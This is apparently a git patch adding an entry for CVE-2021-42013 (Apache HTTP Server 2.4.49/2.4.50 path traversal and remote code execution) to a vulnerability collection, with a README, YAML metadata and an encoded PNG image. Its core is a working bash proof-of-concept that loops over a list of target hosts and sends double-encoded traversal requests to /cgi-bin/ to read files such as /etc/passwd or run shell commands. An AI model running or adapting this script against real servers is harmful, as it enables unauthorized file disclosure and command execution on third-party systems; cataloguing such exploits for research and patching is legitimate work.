From 66924aad54e724c886cb4fe549edc51c7399d899 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Mon, 24 Oct 2022 11:04:29 +0800 Subject: [PATCH 1/2] ADD CVE-2021-42013 --- cve/apache/2021/CVE-2021-42013/PoC.sh | 21 ++++++++++++++++++ cve/apache/2021/CVE-2021-42013/README.md | 18 +++++++++++++++ cve/apache/2021/CVE-2021-42013/apache.png | Bin 0 -> 30936 bytes ...KVE-2022-0206.yaml => CVE-2021-41773.yaml} | 0 cve/apache/2021/yaml/CVE-2021-42013.yaml | 20 +++++++++++++++++ vulnerability_list.yaml | 1 + 6 files changed, 60 insertions(+) create mode 100644 cve/apache/2021/CVE-2021-42013/PoC.sh create mode 100644 cve/apache/2021/CVE-2021-42013/README.md create mode 100644 cve/apache/2021/CVE-2021-42013/apache.png rename cve/apache/2021/yaml/{KVE-2022-0206.yaml => CVE-2021-41773.yaml} (100%) create mode 100644 cve/apache/2021/yaml/CVE-2021-42013.yaml diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache/2021/CVE-2021-42013/PoC.sh new file mode 100644 index 00000000..cf5cfe12 --- /dev/null +++ b/cve/apache/2021/CVE-2021-42013/PoC.sh @@ -0,0 +1,21 @@ +#!/bin/bash + +# Exploit: Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773, CVE-2021-42013 +# Credits: Ash Daulton and the cPanel Security Team + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +echo ./PoC.sh targets.txt /bin/sh id + +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache/2021/CVE-2021-42013/README.md new file mode 100644 index 00000000..6aa6f65a --- /dev/null +++ b/cve/apache/2021/CVE-2021-42013/README.md @@ -0,0 +1,18 @@ + + +## Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE +##### Exploit Author: Lucas Souza https://lsass.io +##### Vendor Homepage: https://apache.org/ +##### Version: 2.4.49, 2.4.50 +##### Tested on: 2.4.49, 2.4.50 +##### CVE : CVE-2021-41773, CVE-2021-42013 +##### Credits: Ash Daulton and the cPanel Security Team + + + + +#### Usage + + ./PoC.sh targets.txt /etc/passwd + + ./PoC.sh targets.txt /bin/sh "id" diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache/2021/CVE-2021-42013/apache.png new file mode 100644 index 0000000000000000000000000000000000000000..d4b2ad27bdf0174310f99ffd299deb459acc17d6 GIT binary patch literal 30936 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

l* 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 